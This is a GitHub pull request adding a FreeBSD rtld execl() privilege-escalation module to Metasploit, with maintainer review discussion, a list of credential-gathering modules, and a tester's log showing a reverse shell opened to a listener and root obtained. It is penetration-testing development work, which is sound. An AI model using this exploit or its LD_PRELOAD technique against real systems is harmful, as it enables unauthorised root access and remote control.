Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add FreeBSD rtld execl() Privilege Escalation module #11808

Merged
merged 1 commit into from May 20, 2019

Conversation

@bcoles
Copy link
Contributor

@bcoles bcoles commented May 3, 2019

Add FreeBSD rtld execl() Privilege Escalation module

@space-r7 space-r7 self-assigned this May 15, 2019
end
vprint_good "FreeBSD version #{kernel_release} appears vulnerable"

unless command_exists? 'gcc'
Copy link
Contributor

@cbrnrd cbrnrd May 19, 2019

Copy link
Contributor Author

@bcoles bcoles May 20, 2019

It does, but this is a FreeBSD module.

The mixins are a mess, and not something I want to tackle in this PR.

Despite BSD and FreeBSD being treated as different platforms in exploit and payload contexts, there are no BSD or FreeBSD mixins. Instead, the closest match is the Unix mixin, which happens to also import msf/core/post/linux/system.

Importing a mixin for a different platform for a single method (that's 1 line long) didn't seem appropriate. This pollutes the namespace and is more likely to introduce issues if the Linux mixins change in the future.

Similarly, there's a method for the is_root? check in the Linux mixins.

Ideally, the UNIX mixin should be updated to support is_root? and has_gcc?, and remove the dependency on msf/core/post/linux/system. The following modules will also need to be updated. Not something I want to tackle in this PR. I think some of the following are unnecessarily including the Unix mixin, and could instead simply import the Linux mixin.

$ grep -rn Msf::Post::Unix modules/
modules/exploits/linux/local/autostart_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/rc_local_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/service_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/cron_persistence.rb:10:  include Msf::Post::Unix
modules/post/linux/gather/ecryptfs_creds.rb:8:  include Msf::Post::Unix
modules/post/linux/manage/sshkey_persistence.rb:14:  include Msf::Post::Unix
modules/post/linux/manage/pseudo_shell.rb:11:  include Msf::Post::Unix
modules/post/multi/gather/maven_creds.rb:11:  include Msf::Post::Unix
modules/post/multi/gather/lastpass_creds.rb:13:  include Msf::Post::Unix
modules/post/multi/gather/docker_creds.rb:10:  include Msf::Post::Unix
modules/post/multi/gather/rsyncd_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/rubygems_api_key.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/fetchmailrc_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/aws_keys.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/netrc_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/ssh_creds.rb:10:  include Msf::Post::Unix
modules/post/multi/gather/gpg_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/dbvis_enum.rb:12:  include Msf::Post::Unix
modules/post/multi/gather/irssi_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/remmina_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/pgpass_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/manage/dbvis_add_db_admin.rb:10:  include Msf::Post::Unix
modules/post/multi/manage/hsts_eraser.rb:10:  include Msf::Post::Unix
modules/post/multi/manage/dbvis_query.rb:10:  include Msf::Post::Unix

@space-r7
Copy link
Contributor

@space-r7 space-r7 commented May 20, 2019

Tested on Freebsd 8.0:

msf5 exploit(multi/ssh/sshexec) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1001(a_user) gid=1001(a_user) groups=1001(a_user),0(wheel)
background

Background session 1? [y/N]  y
msf5 exploit(multi/ssh/sshexec) > use exploit/freebsd/local/rtld_execl_priv_esc 
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
session => 1
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] gcc is installed
[*] Writing '/tmp/.Kw5aja.c' (147 bytes) ...
[*] Writing '/tmp/.3jsxsvcw.c' (365 bytes) ...
[*] Writing '/tmp/.tSblgW0' (172 bytes) ...
[*] Launching exploit...
[*] Command shell session 2 opened (172.16.215.1:4444 -> 172.16.215.135:65296) at 2019-05-20 11:52:45 -0500
[+] Deleted /tmp/.Kw5aja.c
[+] Deleted /tmp/.Kw5aja.o
[+] Deleted /tmp/.wAZZN.0
[+] Deleted /tmp/.3jsxsvcw.c
[+] Deleted /tmp/.3jsxsvcw
[+] Deleted /tmp/.tSblgW0

id
uid=0(root) gid=0(wheel) groups=0(wheel)

I modified sshexec to get the low-privileged shell on the FreeBSD target and just noticed you updated sshexec in another PR that adds the proper targets. Thanks for doing that!

The code LGTM, so I'll get this landed soon.

@space-r7 space-r7 merged commit 2ee7517 into rapid7:master May 20, 2019
3 checks passed
space-r7 added a commit that referenced this issue May 20, 2019
@bcoles bcoles deleted the rtld_execl_priv_esc branch May 20, 2019
@space-r7
Copy link
Contributor

@space-r7 space-r7 commented May 20, 2019

Release Notes

This module results in a shell with root privileges in FreeBSD by exploiting a vulnerability in the run-time link-editor (rtld). Exploiting this vulnerability allows for loading arbitrary objects via LD_PRELOAD that can result in privileged code execution.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

4 participants